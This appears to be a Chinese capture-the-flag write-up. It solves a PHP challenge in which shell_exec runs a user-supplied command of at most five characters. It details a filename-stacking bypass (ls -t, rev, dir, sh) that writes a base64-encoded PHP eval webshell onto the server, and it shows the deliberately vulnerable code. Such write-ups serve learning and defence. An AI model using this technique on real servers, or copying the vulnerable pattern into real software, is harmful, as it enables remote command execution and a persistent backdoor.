源碼:
<?php
error_reporting(0);
highlight_file(__FILE__);
if(strlen($_GET['cmd'])<=5 && !preg_match('/rm/',$_GET['cmd']))
{echo shell_exec($_GET['cmd']);
}
?>
对cmd限制长度五字节
起初是想通过变量来绕过五字节 但好像不起作用
于是尝试使用 常规做法通过文件名的叠加来构造payload:
首先要缩小 ls -t的长度 在linux中 重定向符号可以直接创建文件:
我们使用如下方法:
>-t
>lsroot@forg:/var/www/html/test# ls
ls -t
#使用*触发命令 按顺序触发 默认顺序是数字字母符号的顺序
此时还不能够将ls -t的长度缩短 需要将命令写入到一个新的文件中 方便执行
但是由于 '>f'参数永远会处于ls的第一个 文件 导致顺序不正确
需要使用 rev命令做一个倒置
再使用dir将结果输出到一个文件中
d下来是f所以文件名取为f
综合下来:
>sl
>ht-
>f\>
>dir
# 此时*触发:
root@forg:/var/www/html/test# *
f> ht- sl
# 对结果进行重定向 写到一个新的文件中: 等下需要匹配*v所以目标文件名一定与rev的结末字符一致
*>v
# 创建rev对文件内容进行倒置
root@forg:/var/www/html/test# >rev
最后将内容写入到新的文件中a中 最后运行a文件
sh a
最后f文件内存应该存放的是一句话木马 接下来的操作较为简单 与七字符绕过基本一致
将payload base64编码
PD9waHAgZWNobyBldmFsKCRfR0VUWycxJ10pID8+
通过base64解码
整体命令为:echo PD9waHAgZWNobyBldmFsKCRfR0VUWycxJ10pID8+ | base64 -d
将字符按照总后向前的顺序依次写入
>\-d
>4\
>se6
>ba
...........
>PD9sh a 将命令写入到f中
最后f 中存放着一句话木马
